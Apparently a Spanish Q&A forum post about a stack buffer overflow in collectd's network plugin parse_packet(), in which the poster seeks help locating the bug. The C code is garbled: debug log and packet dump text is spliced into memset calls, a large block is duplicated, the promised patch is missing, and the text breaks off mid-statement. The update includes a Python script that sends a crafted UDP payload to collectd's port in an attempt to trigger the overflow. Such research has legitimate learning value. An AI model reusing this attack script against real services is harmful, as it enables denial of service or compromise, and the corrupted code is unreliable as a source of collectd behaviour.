Intentando entender este fragmento de código:
Contiene una vulnerabilidad de desbordamiento de búfer de pila:
static int parse_packet (sockent_t *se, /* {{{ */
void *buffer, size_t buffer_size, int flags,
const char *username)
{
int status;
value_list_t vl = VALUE_LIST_INIT;
notification_t n;
#if HAVE_LIBGCRYPT
int packet_was_signed = (flags & PP_SIGNED);
int packet_was_encrypted = (flags & PP_ENCRYPTED);
int printed_ignore_warning = 0;
#endif /* HAVE_LIBGCRYPT */
memset (&vl, ' parse_packet()
bufer_size:260
packet_was_encrypted:0
packet_was_signed:0
se->data.server.security_level:0
While() 0
buffer_size:260
Packet dump:400005004000050140000502400005034000050440000505400005064000050740000508400005094000050A4000050B4000050C4000050D4000050E4000050F400005104000051140000512400005134000051440000515400005164000051740000518400005194000051A4000051B4000051C4000051D4000051E4000051F400005204000052140000522400005234000052440000525400005264000052740000528400005294000052A4000052B4000052C4000052D4000052E4000052F400005304000053140000532400005334000053440000535400005364000053740000538400005394000053A4000053B4000053C4000053D4000053E4000053F400005404000054140000542400005434000054440000545400005464000054740000548400005494000054A4000054B4000054C4000054D4000054E4000054F400005504000055140000552400005534000055440000555400005564000055740000558400005594000055A4000055B4000055C4000055D4000055E4000055F400005604000056140000562400005634000056440000565400005664000056740000568400005694000056A4000056B4000056C4000056D4000056E4000056F400005704000057140000572400005734000057440000575400005764000057740000578400005794000057A4000057B4000057C4000057D4000057E4000057F400005804000058140000582400005834000058440000585400005864000058740000588400005894000058A4000058B4000058C4000058D4000058E4000058F400005904000059140000592400005934000059440000595400005964000059740000598400005994000059A4000059B4000059C4000059D4000059E4000059F400005A0400005A1400005A2400005A3400005A4400005A5400005A6400005A7400005A8400005A9400005AA400005AB400005AC400005AD400005AE400005AF400005B0400005B1400005B2400005B3400005B4400005B5400005B6400005B7400005B8400005B9400005BA400005BB400005BC400005BD400005BE400005BF400005C0400005C1400005C2400005C3400005C4400005C5400005C6400005C7400005C8400005C9400005CA400005CB400005CC400005CD400005CE400005CF400005D0400005D1400005D2400005D3400005D4400005D5400005D6400005D7400005D8400005D9400005DA400005DB400005DC400005DD400005DE400005DF400005E0400005E1400005E2400005E3400005E4400005E5400005E6400005E7400005E8400005E9400005EA400005EB400005EC400005ED400005EE400005EF400005F0400005F1400005F2400005F3400005F4400005F5400005F6400005F7400005F8400005F9400005FA400005FB400005FC400005FD400005FE400005FF40000600400006014000060240000603
pkg_length:16384
pkg_type:1280
pkg_length(ntohs):64
pkg_type(ntohs):5
pkg_type == TYPE_TYPE_INSTANCE
buffer_size:260
While() 1
buffer_size:196
Packet dump:400005004000050140000502400005034000050440000505400005064000050740000508400005094000050A4000050B4000050C4000050D4000050E4000050F400005104000051140000512400005134000051440000515400005164000051740000518400005194000051A4000051B4000051C4000051D4000051E4000051F400005204000052140000522400005234000052440000525400005264000052740000528400005294000052A4000052B4000052C4000052D4000052E4000052F400005304000053140000532400005334000053440000535400005364000053740000538400005394000053A4000053B4000053C4000053D4000053E4000053F400005404000054140000542400005434000054440000545400005464000054740000548400005494000054A4000054B4000054C4000054D4000054E4000054F400005504000055140000552400005534000055440000555400005564000055740000558400005594000055A4000055B4000055C4000055D4000055E4000055F400005604000056140000562400005634000056440000565400005664000056740000568400005694000056A4000056B4000056C4000056D4000056E4000056F400005704000057140000572400005734000057440000575400005764000057740000578400005794000057A4000057B4000057C4000057D4000057E4000057F400005804000058140000582400005834000058440000585400005864000058740000588400005894000058A4000058B4000058C4000058D4000058E4000058F400005904000059140000592400005934000059440000595400005964000059740000598400005994000059A4000059B4000059C4000059D4000059E4000059F400005A0400005A1400005A2400005A3400005A4400005A5400005A6400005A7400005A8400005A9400005AA400005AB400005AC400005AD400005AE400005AF400005B0400005B1400005B2400005B3400005B4400005B5400005B6400005B7400005B8400005B9400005BA400005BB400005BC400005BD400005BE400005BF400005C0400005C1400005C2400005C3
pkg_length:16384
pkg_type:1280
pkg_length(ntohs):64
pkg_type(ntohs):5
pkg_type == TYPE_TYPE_INSTANCE
buffer_size:196
While() 2
buffer_size:132
Packet dump:420005004200050142000502420005034200050442000505420005064200050742000508420005094200050A4200050B4200050C4200050D4200050E4200050F420005104200051142000512420005134200051442000515420005164200051742000518420005194200051A4200051B4200051C4200051D4200051E4200051F420005204200052142000522420005234200052442000525420005264200052742000528420005294200052A4200052B4200052C4200052D4200052E4200052F420005304200053142000532420005334200053442000535420005364200053742000538420005394200053A4200053B4200053C4200053D4200053E4200053F420005404200054142000542420005434200054442000545420005464200054742000548420005494200054A4200054B4200054C4200054D4200054E4200054F420005504200055142000552420005534200055442000555420005564200055742000558420005594200055A4200055B4200055C4200055D4200055E4200055F420005604200056142000562420005634200056442000565420005664200056742000568420005694200056A4200056B4200056C4200056D4200056E4200056F420005704200057142000572420005734200057442000575420005764200057742000578420005794200057A4200057B4200057C4200057D4200057E4200057F42000580420005814200058242000583
pkg_length:16896
pkg_type:1280
pkg_length(ntohs):66
pkg_type(ntohs):5
pkg_type == TYPE_TYPE_INSTANCE
buffer_size:132
While() 3
buffer_size:66
Packet dump:420005004200050142000502420005034200050442000505420005064200050742000508420005094200050A4200050B4200050C4200050D4200050E4200050F420005104200051142000512420005134200051442000515420005164200051742000518420005194200051A4200051B4200051C4200051D4200051E4200051F420005204200052142000522420005234200052442000525420005264200052742000528420005294200052A4200052B4200052C4200052D4200052E4200052F420005304200053142000532420005334200053442000535420005364200053742000538420005394200053A4200053B4200053C4200053D4200053E4200053F4200054042000541
pkg_length:16896
pkg_type:1280
pkg_length(ntohs):66
pkg_type(ntohs):5
pkg_type == TYPE_TYPE_INSTANCE
buffer_size:66
', sizeof (vl));
memset (&n, 'option = Hostname; value = 127.0.0.1;
option = FQDNLookup; value = true;
option = BaseDir; value = /opt/collectd/var/lib/collectd;
option = PIDFile; value = /opt/collectd/var/run/collectd.pid;
Done parsing '/opt/collectd/share/collectd/types.db'
Created new plugin context.
parse_packet()
bufer_size:260
packet_was_encrypted:0
packet_was_signed:0
se->data.server.security_level:0
While() 0
buffer_size:260
Packet dump:400005004000050140000502400005034000050440000505400005064000050740000508400005094000050A4000050B4000050C4000050D4000050E4000050F400005104000051140000512400005134000051440000515400005164000051740000518400005194000051A4000051B4000051C4000051D4000051E4000051F400005204000052140000522400005234000052440000525400005264000052740000528400005294000052A4000052B4000052C4000052D4000052E4000052F400005304000053140000532400005334000053440000535400005364000053740000538400005394000053A4000053B4000053C4000053D4000053E4000053F400005404000054140000542400005434000054440000545400005464000054740000548400005494000054A4000054B4000054C4000054D4000054E4000054F400005504000055140000552400005534000055440000555400005564000055740000558400005594000055A4000055B4000055C4000055D4000055E4000055F400005604000056140000562400005634000056440000565400005664000056740000568400005694000056A4000056B4000056C4000056D4000056E4000056F400005704000057140000572400005734000057440000575400005764000057740000578400005794000057A4000057B4000057C4000057D4000057E4000057F400005804000058140000582400005834000058440000585400005864000058740000588400005894000058A4000058B4000058C4000058D4000058E4000058F400005904000059140000592400005934000059440000595400005964000059740000598400005994000059A4000059B4000059C4000059D4000059E4000059F400005A0400005A1400005A2400005A3400005A4400005A5400005A6400005A7400005A8400005A9400005AA400005AB400005AC400005AD400005AE400005AF400005B0400005B1400005B2400005B3400005B4400005B5400005B6400005B7400005B8400005B9400005BA400005BB400005BC400005BD400005BE400005BF400005C0400005C1400005C2400005C3400005C4400005C5400005C6400005C7400005C8400005C9400005CA400005CB400005CC400005CD400005CE400005CF400005D0400005D1400005D2400005D3400005D4400005D5400005D6400005D7400005D8400005D9400005DA400005DB400005DC400005DD400005DE400005DF400005E0400005E1400005E2400005E3400005E4400005E5400005E6400005E7400005E8400005E9400005EA400005EB400005EC400005ED400005EE400005EF400005F0400005F1400005F2400005F3400005F4400005F5400005F6400005F7400005F8400005F9400005FA400005FB400005FC400005FD400005FE400005FF40000600400006014000060240000603
pkg_length:16384
pkg_type:1280
pkg_length(ntohs):64
pkg_type(ntohs):5
pkg_type == TYPE_TYPE_INSTANCE
buffer_size:260
While() 1
buffer_size:196
Packet dump:400005004000050140000502400005034000050440000505400005064000050740000508400005094000050A4000050B4000050C4000050D4000050E4000050F400005104000051140000512400005134000051440000515400005164000051740000518400005194000051A4000051B4000051C4000051D4000051E4000051F400005204000052140000522400005234000052440000525400005264000052740000528400005294000052A4000052B4000052C4000052D4000052E4000052F400005304000053140000532400005334000053440000535400005364000053740000538400005394000053A4000053B4000053C4000053D4000053E4000053F400005404000054140000542400005434000054440000545400005464000054740000548400005494000054A4000054B4000054C4000054D4000054E4000054F400005504000055140000552400005534000055440000555400005564000055740000558400005594000055A4000055B4000055C4000055D4000055E4000055F400005604000056140000562400005634000056440000565400005664000056740000568400005694000056A4000056B4000056C4000056D4000056E4000056F400005704000057140000572400005734000057440000575400005764000057740000578400005794000057A4000057B4000057C4000057D4000057E4000057F400005804000058140000582400005834000058440000585400005864000058740000588400005894000058A4000058B4000058C4000058D4000058E4000058F400005904000059140000592400005934000059440000595400005964000059740000598400005994000059A4000059B4000059C4000059D4000059E4000059F400005A0400005A1400005A2400005A3400005A4400005A5400005A6400005A7400005A8400005A9400005AA400005AB400005AC400005AD400005AE400005AF400005B0400005B1400005B2400005B3400005B4400005B5400005B6400005B7400005B8400005B9400005BA400005BB400005BC400005BD400005BE400005BF400005C0400005C1400005C2400005C3
pkg_length:16384
pkg_type:1280
pkg_length(ntohs):64
pkg_type(ntohs):5
pkg_type == TYPE_TYPE_INSTANCE
buffer_size:196
While() 2
buffer_size:132
Packet dump:420005004200050142000502420005034200050442000505420005064200050742000508420005094200050A4200050B4200050C4200050D4200050E4200050F420005104200051142000512420005134200051442000515420005164200051742000518420005194200051A4200051B4200051C4200051D4200051E4200051F420005204200052142000522420005234200052442000525420005264200052742000528420005294200052A4200052B4200052C4200052D4200052E4200052F420005304200053142000532420005334200053442000535420005364200053742000538420005394200053A4200053B4200053C4200053D4200053E4200053F420005404200054142000542420005434200054442000545420005464200054742000548420005494200054A4200054B4200054C4200054D4200054E4200054F420005504200055142000552420005534200055442000555420005564200055742000558420005594200055A4200055B4200055C4200055D4200055E4200055F420005604200056142000562420005634200056442000565420005664200056742000568420005694200056A4200056B4200056C4200056D4200056E4200056F420005704200057142000572420005734200057442000575420005764200057742000578420005794200057A4200057B4200057C4200057D4200057E4200057F42000580420005814200058242000583
pkg_length:16896
pkg_type:1280
pkg_length(ntohs):66
pkg_type(ntohs):5
pkg_type == TYPE_TYPE_INSTANCE
buffer_size:132
While() 3
buffer_size:66
Packet dump:430005004300050143000502430005034300050443000505430005064300050743000508430005094300050A4300050B4300050C4300050D4300050E4300050F430005104300051143000512430005134300051443000515430005164300051743000518430005194300051A4300051B4300051C4300051D4300051E4300051F430005204300052143000522430005234300052443000525430005264300052743000528430005294300052A4300052B4300052C4300052D4300052E4300052F430005304300053143000532430005334300053443000535430005364300053743000538430005394300053A4300053B4300053C4300053D4300053E4300053F4300054043000541
pkg_length:17152
pkg_type:1280
pkg_length(ntohs):67
pkg_type(ntohs):5
Break pkg_length > buffer_size
', sizeof (n));
status = 0;
while ((status == 0) && (0 < buffer_size)
&& ((unsigned int) buffer_size > sizeof (part_header_t)))
{
uint16_t pkg_length;
uint16_t pkg_type;
memcpy ((void *) &pkg_type,
(void *) buffer,
sizeof (pkg_type));
memcpy ((void *) &pkg_length,
(void *) (buffer + sizeof (pkg_type)),
sizeof (pkg_length));
pkg_length = ntohs (pkg_length);
pkg_type = ntohs (pkg_type);
if (pkg_length > buffer_size)
break;
/* Ensure that this loop terminates eventually */
if (pkg_length < (2 * sizeof (uint16_t)))
break;
if (pkg_type == TYPE_ENCR_AES256)
{
status = parse_part_encr_aes256 (se,
&buffer, &buffer_size, flags);
if (status != 0)
{
ERROR ("network plugin: Decrypting AES256 "
"part failed "
"with status %i.", status);
break;
}
}
#if HAVE_LIBGCRYPT
else if ((se->data.server.security_level == SECURITY_LEVEL_ENCRYPT)
&& (packet_was_encrypted == 0))
{
if (printed_ignore_warning == 0)
{
INFO ("network plugin: Unencrypted packet or "
"part has been ignored.");
printed_ignore_warning = 1;
}
buffer = ((char *) buffer) + pkg_length;
continue;
}
#endif /* HAVE_LIBGCRYPT */
else if (pkg_type == TYPE_SIGN_SHA256)
{
status = parse_part_sign_sha256 (se,
&buffer, &buffer_size, flags);
if (status != 0)
{
ERROR ("network plugin: Verifying HMAC-SHA-256 "
"signature failed "
"with status %i.", status);
break;
}
}
#if HAVE_LIBGCRYPT
else if ((se->data.server.security_level == SECURITY_LEVEL_SIGN)
&& (packet_was_encrypted == 0)
&& (packet_was_signed == 0))
{
if (printed_ignore_warning == 0)
{
INFO ("network plugin: Unsigned packet or "
"part has been ignored.");
printed_ignore_warning = 1;
}
buffer = ((char *) buffer) + pkg_length;
continue;
}
#endif /* HAVE_LIBGCRYPT */
else if (pkg_type == TYPE_VALUES)
{
status = parse_part_values (&buffer, &buffer_size,
&vl.values, &vl.values_len);
if (status != 0)
break;
network_dispatch_values (&vl, username);
sfree (vl.values);
}
else if (pkg_type == TYPE_TIME)
{
uint64_t tmp = 0;
status = parse_part_number (&buffer, &buffer_size,
&tmp);
if (status == 0)
{
vl.time = TIME_T_TO_CDTIME_T (tmp);
n.time = TIME_T_TO_CDTIME_T (tmp);
}
}
else if (pkg_type == TYPE_TIME_HR)
{
uint64_t tmp = 0;
status = parse_part_number (&buffer, &buffer_size,
&tmp);
if (status == 0)
{
vl.time = (cdtime_t) tmp;
n.time = (cdtime_t) tmp;
}
}
else if (pkg_type == TYPE_INTERVAL)
{
uint64_t tmp = 0;
status = parse_part_number (&buffer, &buffer_size,
&tmp);
if (status == 0)
vl.interval = TIME_T_TO_CDTIME_T (tmp);
}
else if (pkg_type == TYPE_INTERVAL_HR)
{
uint64_t tmp = 0;
status = parse_part_number (&buffer, &buffer_size,
&tmp);
if (status == 0)
vl.interval = (cdtime_t) tmp;
}
else if (pkg_type == TYPE_HOST)
{
status = parse_part_string (&buffer, &buffer_size,
vl.host, sizeof (vl.host));
if (status == 0)
sstrncpy (n.host, vl.host, sizeof (n.host));
}
else if (pkg_type == TYPE_PLUGIN)
{
status = parse_part_string (&buffer, &buffer_size,
vl.plugin, sizeof (vl.plugin));
if (status == 0)
sstrncpy (n.plugin, vl.plugin,
sizeof (n.plugin));
}
else if (pkg_type == TYPE_PLUGIN_INSTANCE)
{
status = parse_part_string (&buffer, &buffer_size,
vl.plugin_instance,
sizeof (vl.plugin_instance));
if (status == 0)
sstrncpy (n.plugin_instance,
vl.plugin_instance,
sizeof (n.plugin_instance));
}
else if (pkg_type == TYPE_TYPE)
{
status = parse_part_string (&buffer, &buffer_size,
vl.type, sizeof (vl.type));
if (status == 0)
sstrncpy (n.type, vl.type, sizeof (n.type));
}
else if (pkg_type == TYPE_TYPE_INSTANCE)
{
status = parse_part_string (&buffer, &buffer_size,
vl.type_instance,
sizeof (vl.type_instance));
if (status == 0)
sstrncpy (n.type_instance, vl.type_instance,
sizeof (n.type_instance));
}
else if (pkg_type == TYPE_MESSAGE)
{
status = parse_part_string (&buffer, &buffer_size,
n.message, sizeof (n.message));
if (status != 0)
{
/* do nothing */
}
else if ((n.severity != NOTIF_FAILURE)
&& (n.severity != NOTIF_WARNING)
&& (n.severity != NOTIF_OKAY))
{
INFO ("network plugin: "
"Ignoring notification with "
"unknown severity %i.",
n.severity);
}
else if (n.time <= 0)
{
INFO ("network plugin: "
"Ignoring notification with "
"time == 0.");
}
else if (strlen (n.message) <= 0)
{
INFO ("network plugin: "
"Ignoring notification with "
"an empty message.");
}
else
{
plugin_dispatch_notification (&n);
}
}
else if (pkg_type == TYPE_SEVERITY)
{
uint64_t tmp = 0;
status = parse_part_number (&buffer, &buffer_size,
&tmp);
if (status == 0)
n.severity = (int) tmp;
}
else
{
DEBUG ("network plugin: parse_packet: Unknown part"
" type: 0x%04hx", pkg_type);
buffer = ((char *) buffer) + pkg_length;
}
} /* while (buffer_size > sizeof (part_header_t)) */
if (status == 0 && buffer_size > 0)
WARNING ("network plugin: parse_packet: Received truncated "
"packet, try increasing 'MaxPacketSize'");
return (status);
} /* }}} int parse_packet */
Fue parcheado con esto:
Pasé un tiempo investigándolo pero no puedo encontrar el error ...
¿Alguien puede ayudar?
Actualización 1:
Gracias por las respuestas, especialmente @grochmal
Mi intento de hacer un desbordamiento de búfer / desbordamiento de pila:
import socket
UDP_IP = "127.0.0.1"
UDP_PORT = 25826
print "UDP target IP:", UDP_IP
print "UDP target port:", UDP_PORT
sock = socket.socket(socket.AF_INET, # Internet
socket.SOCK_DGRAM) # UDP
str="\x00\x05\x00\x40\x6c\x61\x70\x74\x6f\x70\x00\x05\x01\x00\x0c\x00\x00\x00\x00\x58\x9c\xc5\x59\x00\x02\x00\x08\x61\x6e\x79\x00\x00\x03\x00\x40\x00\x00\x04\x00\x0a\x67\x61\x75\x67\x65\x00\x00\x07\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x05\x00\x15\x63\x00\x00\x05\x00\x40\x40\x6c\x61\x70\x74\x6f\x70\x00\x05\x01\x00\x0c\x00\x00\x00\x00\x58\x9c\xc5\x59\x00\x02\x00\x08\x61\x6e\x79\x00\x00\x03\x00\x05\x00\x00\x04\x00\x0a\x67\x61\x75\x67\x65\x00\x00\x07\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x05\x00\x15\x00\x00\x05\x00\x42\x40\x6c\x61\x70\x74\x6f\x70\x00\x05\x01\x00\x0c\x00\x00\x00\x00\x58\x9c\xc5\x59\x00\x02\x00\x08\x61\x6e\x79\x00\x00\x03\x00\x05\x00\x00\x04\x00\x0a\x67\x61\x75\x67\x65\x00\x00\x07\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x05\x00\x15\x00\x00\x00\x00\x05\x00\x42\x40\x6c\x61\x70\x74\x6f\x70\x00\x05\x01\x00\x0c\x00\x00\x00\x00\x58\x9c\xc5\x59\x00\x02\x00\x08\x61\x6e\x79\x00\x00\x03\x00\x05\x00\x00\x04\x00\x0a\x67\x61\x75\x67\x65\x00\x00\x07\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x05\x00\x15\x00\x00\x00\x00\x06\x00\x33\x00\x50\x01\x00\x00\x00\x00\x00\x00\x10\x40\x01\x00\x00\x00\x00\x00\x00\x10\x40\x01\x00\x00\x00\x00\x00\x00\x10\x40\x01\x00\x00\x00\x00\x00\x00\x10\x40\x01\x00\x00\x00\x00\x00\x00\x10\x40"
sock.sendto(str,(UDP_IP, UDP_PORT))
Pero de alguna manera no puedo pasar el búfer ... si configuro el pkg_lenght en el último paquete a 67, obtengo esto:
static int parse_packet (sockent_t *se, /* {{{ */
void *buffer, size_t buffer_size, int flags,
const char *username)
{
int status;
value_list_t vl = VALUE_LIST_INIT;
notification_t n;
#if HAVE_LIBGCRYPT
int packet_was_signed = (flags & PP_SIGNED);
int packet_was_encrypted = (flags & PP_ENCRYPTED);
int printed_ignore_warning = 0;
#endif /* HAVE_LIBGCRYPT */
memset (&vl, ' parse_packet()
bufer_size:260
packet_was_encrypted:0
packet_was_signed:0
se->data.server.security_level:0
While() 0
buffer_size:260
Packet dump:400005004000050140000502400005034000050440000505400005064000050740000508400005094000050A4000050B4000050C4000050D4000050E4000050F400005104000051140000512400005134000051440000515400005164000051740000518400005194000051A4000051B4000051C4000051D4000051E4000051F400005204000052140000522400005234000052440000525400005264000052740000528400005294000052A4000052B4000052C4000052D4000052E4000052F400005304000053140000532400005334000053440000535400005364000053740000538400005394000053A4000053B4000053C4000053D4000053E4000053F400005404000054140000542400005434000054440000545400005464000054740000548400005494000054A4000054B4000054C4000054D4000054E4000054F400005504000055140000552400005534000055440000555400005564000055740000558400005594000055A4000055B4000055C4000055D4000055E4000055F400005604000056140000562400005634000056440000565400005664000056740000568400005694000056A4000056B4000056C4000056D4000056E4000056F400005704000057140000572400005734000057440000575400005764000057740000578400005794000057A4000057B4000057C4000057D4000057E4000057F400005804000058140000582400005834000058440000585400005864000058740000588400005894000058A4000058B4000058C4000058D4000058E4000058F400005904000059140000592400005934000059440000595400005964000059740000598400005994000059A4000059B4000059C4000059D4000059E4000059F400005A0400005A1400005A2400005A3400005A4400005A5400005A6400005A7400005A8400005A9400005AA400005AB400005AC400005AD400005AE400005AF400005B0400005B1400005B2400005B3400005B4400005B5400005B6400005B7400005B8400005B9400005BA400005BB400005BC400005BD400005BE400005BF400005C0400005C1400005C2400005C3400005C4400005C5400005C6400005C7400005C8400005C9400005CA400005CB400005CC400005CD400005CE400005CF400005D0400005D1400005D2400005D3400005D4400005D5400005D6400005D7400005D8400005D9400005DA400005DB400005DC400005DD400005DE400005DF400005E0400005E1400005E2400005E3400005E4400005E5400005E6400005E7400005E8400005E9400005EA400005EB400005EC400005ED400005EE400005EF400005F0400005F1400005F2400005F3400005F4400005F5400005F6400005F7400005F8400005F9400005FA400005FB400005FC400005FD400005FE400005FF40000600400006014000060240000603
pkg_length:16384
pkg_type:1280
pkg_length(ntohs):64
pkg_type(ntohs):5
pkg_type == TYPE_TYPE_INSTANCE
buffer_size:260
While() 1
buffer_size:196
Packet dump:400005004000050140000502400005034000050440000505400005064000050740000508400005094000050A4000050B4000050C4000050D4000050E4000050F400005104000051140000512400005134000051440000515400005164000051740000518400005194000051A4000051B4000051C4000051D4000051E4000051F400005204000052140000522400005234000052440000525400005264000052740000528400005294000052A4000052B4000052C4000052D4000052E4000052F400005304000053140000532400005334000053440000535400005364000053740000538400005394000053A4000053B4000053C4000053D4000053E4000053F400005404000054140000542400005434000054440000545400005464000054740000548400005494000054A4000054B4000054C4000054D4000054E4000054F400005504000055140000552400005534000055440000555400005564000055740000558400005594000055A4000055B4000055C4000055D4000055E4000055F400005604000056140000562400005634000056440000565400005664000056740000568400005694000056A4000056B4000056C4000056D4000056E4000056F400005704000057140000572400005734000057440000575400005764000057740000578400005794000057A4000057B4000057C4000057D4000057E4000057F400005804000058140000582400005834000058440000585400005864000058740000588400005894000058A4000058B4000058C4000058D4000058E4000058F400005904000059140000592400005934000059440000595400005964000059740000598400005994000059A4000059B4000059C4000059D4000059E4000059F400005A0400005A1400005A2400005A3400005A4400005A5400005A6400005A7400005A8400005A9400005AA400005AB400005AC400005AD400005AE400005AF400005B0400005B1400005B2400005B3400005B4400005B5400005B6400005B7400005B8400005B9400005BA400005BB400005BC400005BD400005BE400005BF400005C0400005C1400005C2400005C3
pkg_length:16384
pkg_type:1280
pkg_length(ntohs):64
pkg_type(ntohs):5
pkg_type == TYPE_TYPE_INSTANCE
buffer_size:196
While() 2
buffer_size:132
Packet dump:420005004200050142000502420005034200050442000505420005064200050742000508420005094200050A4200050B4200050C4200050D4200050E4200050F420005104200051142000512420005134200051442000515420005164200051742000518420005194200051A4200051B4200051C4200051D4200051E4200051F420005204200052142000522420005234200052442000525420005264200052742000528420005294200052A4200052B4200052C4200052D4200052E4200052F420005304200053142000532420005334200053442000535420005364200053742000538420005394200053A4200053B4200053C4200053D4200053E4200053F420005404200054142000542420005434200054442000545420005464200054742000548420005494200054A4200054B4200054C4200054D4200054E4200054F420005504200055142000552420005534200055442000555420005564200055742000558420005594200055A4200055B4200055C4200055D4200055E4200055F420005604200056142000562420005634200056442000565420005664200056742000568420005694200056A4200056B4200056C4200056D4200056E4200056F420005704200057142000572420005734200057442000575420005764200057742000578420005794200057A4200057B4200057C4200057D4200057E4200057F42000580420005814200058242000583
pkg_length:16896
pkg_type:1280
pkg_length(ntohs):66
pkg_type(ntohs):5
pkg_type == TYPE_TYPE_INSTANCE
buffer_size:132
While() 3
buffer_size:66
Packet dump:420005004200050142000502420005034200050442000505420005064200050742000508420005094200050A4200050B4200050C4200050D4200050E4200050F420005104200051142000512420005134200051442000515420005164200051742000518420005194200051A4200051B4200051C4200051D4200051E4200051F420005204200052142000522420005234200052442000525420005264200052742000528420005294200052A4200052B4200052C4200052D4200052E4200052F420005304200053142000532420005334200053442000535420005364200053742000538420005394200053A4200053B4200053C4200053D4200053E4200053F4200054042000541
pkg_length:16896
pkg_type:1280
pkg_length(ntohs):66
pkg_type(ntohs):5
pkg_type == TYPE_TYPE_INSTANCE
buffer_size:66
', sizeof (vl));
memset (&n, 'option = Hostname; value = 127.0.0.1;
option = FQDNLookup; value = true;
option = BaseDir; value = /opt/collectd/var/lib/collectd;
option = PIDFile; value = /opt/collectd/var/run/collectd.pid;
Done parsing '/opt/collectd/share/collectd/types.db'
Created new plugin context.
parse_packet()
bufer_size:260
packet_was_encrypted:0
packet_was_signed:0
se->data.server.security_level:0
While() 0
buffer_size:260
Packet dump:400005004000050140000502400005034000050440000505400005064000050740000508400005094000050A4000050B4000050C4000050D4000050E4000050F400005104000051140000512400005134000051440000515400005164000051740000518400005194000051A4000051B4000051C4000051D4000051E4000051F400005204000052140000522400005234000052440000525400005264000052740000528400005294000052A4000052B4000052C4000052D4000052E4000052F400005304000053140000532400005334000053440000535400005364000053740000538400005394000053A4000053B4000053C4000053D4000053E4000053F400005404000054140000542400005434000054440000545400005464000054740000548400005494000054A4000054B4000054C4000054D4000054E4000054F400005504000055140000552400005534000055440000555400005564000055740000558400005594000055A4000055B4000055C4000055D4000055E4000055F400005604000056140000562400005634000056440000565400005664000056740000568400005694000056A4000056B4000056C4000056D4000056E4000056F400005704000057140000572400005734000057440000575400005764000057740000578400005794000057A4000057B4000057C4000057D4000057E4000057F400005804000058140000582400005834000058440000585400005864000058740000588400005894000058A4000058B4000058C4000058D4000058E4000058F400005904000059140000592400005934000059440000595400005964000059740000598400005994000059A4000059B4000059C4000059D4000059E4000059F400005A0400005A1400005A2400005A3400005A4400005A5400005A6400005A7400005A8400005A9400005AA400005AB400005AC400005AD400005AE400005AF400005B0400005B1400005B2400005B3400005B4400005B5400005B6400005B7400005B8400005B9400005BA400005BB400005BC400005BD400005BE400005BF400005C0400005C1400005C2400005C3400005C4400005C5400005C6400005C7400005C8400005C9400005CA400005CB400005CC400005CD400005CE400005CF400005D0400005D1400005D2400005D3400005D4400005D5400005D6400005D7400005D8400005D9400005DA400005DB400005DC400005DD400005DE400005DF400005E0400005E1400005E2400005E3400005E4400005E5400005E6400005E7400005E8400005E9400005EA400005EB400005EC400005ED400005EE400005EF400005F0400005F1400005F2400005F3400005F4400005F5400005F6400005F7400005F8400005F9400005FA400005FB400005FC400005FD400005FE400005FF40000600400006014000060240000603
pkg_length:16384
pkg_type:1280
pkg_length(ntohs):64
pkg_type(ntohs):5
pkg_type == TYPE_TYPE_INSTANCE
buffer_size:260
While() 1
buffer_size:196
Packet dump:400005004000050140000502400005034000050440000505400005064000050740000508400005094000050A4000050B4000050C4000050D4000050E4000050F400005104000051140000512400005134000051440000515400005164000051740000518400005194000051A4000051B4000051C4000051D4000051E4000051F400005204000052140000522400005234000052440000525400005264000052740000528400005294000052A4000052B4000052C4000052D4000052E4000052F400005304000053140000532400005334000053440000535400005364000053740000538400005394000053A4000053B4000053C4000053D4000053E4000053F400005404000054140000542400005434000054440000545400005464000054740000548400005494000054A4000054B4000054C4000054D4000054E4000054F400005504000055140000552400005534000055440000555400005564000055740000558400005594000055A4000055B4000055C4000055D4000055E4000055F400005604000056140000562400005634000056440000565400005664000056740000568400005694000056A4000056B4000056C4000056D4000056E4000056F400005704000057140000572400005734000057440000575400005764000057740000578400005794000057A4000057B4000057C4000057D4000057E4000057F400005804000058140000582400005834000058440000585400005864000058740000588400005894000058A4000058B4000058C4000058D4000058E4000058F400005904000059140000592400005934000059440000595400005964000059740000598400005994000059A4000059B4000059C4000059D4000059E4000059F400005A0400005A1400005A2400005A3400005A4400005A5400005A6400005A7400005A8400005A9400005AA400005AB400005AC400005AD400005AE400005AF400005B0400005B1400005B2400005B3400005B4400005B5400005B6400005B7400005B8400005B9400005BA400005BB400005BC400005BD400005BE400005BF400005C0400005C1400005C2400005C3
pkg_length:16384
pkg_type:1280
pkg_length(ntohs):64
pkg_type(ntohs):5
pkg_type == TYPE_TYPE_INSTANCE
buffer_size:196
While() 2
buffer_size:132
Packet dump:420005004200050142000502420005034200050442000505420005064200050742000508420005094200050A4200050B4200050C4200050D4200050E4200050F420005104200051142000512420005134200051442000515420005164200051742000518420005194200051A4200051B4200051C4200051D4200051E4200051F420005204200052142000522420005234200052442000525420005264200052742000528420005294200052A4200052B4200052C4200052D4200052E4200052F420005304200053142000532420005334200053442000535420005364200053742000538420005394200053A4200053B4200053C4200053D4200053E4200053F420005404200054142000542420005434200054442000545420005464200054742000548420005494200054A4200054B4200054C4200054D4200054E4200054F420005504200055142000552420005534200055442000555420005564200055742000558420005594200055A4200055B4200055C4200055D4200055E4200055F420005604200056142000562420005634200056442000565420005664200056742000568420005694200056A4200056B4200056C4200056D4200056E4200056F420005704200057142000572420005734200057442000575420005764200057742000578420005794200057A4200057B4200057C4200057D4200057E4200057F42000580420005814200058242000583
pkg_length:16896
pkg_type:1280
pkg_length(ntohs):66
pkg_type(ntohs):5
pkg_type == TYPE_TYPE_INSTANCE
buffer_size:132
While() 3
buffer_size:66
Packet dump:430005004300050143000502430005034300050443000505430005064300050743000508430005094300050A4300050B4300050C4300050D4300050E4300050F430005104300051143000512430005134300051443000515430005164300051743000518430005194300051A4300051B4300051C4300051D4300051E4300051F430005204300052143000522430005234300052443000525430005264300052743000528430005294300052A4300052B4300052C4300052D4300052E4300052F430005304300053143000532430005334300053443000535430005364300053743000538430005394300053A4300053B4300053C4300053D4300053E4300053F4300054043000541
pkg_length:17152
pkg_type:1280
pkg_length(ntohs):67
pkg_type(ntohs):5
Break pkg_length > buffer_size
', sizeof (n));
status = 0;
while ((status == 0) && (0 < buffer_size)
&& ((unsigned int) buffer_size > sizeof (part_header_t)))
{
uint16_t pkg_length;
uint16_t pkg_type;
memcpy ((void *) &pkg_type,
(void *) buffer,
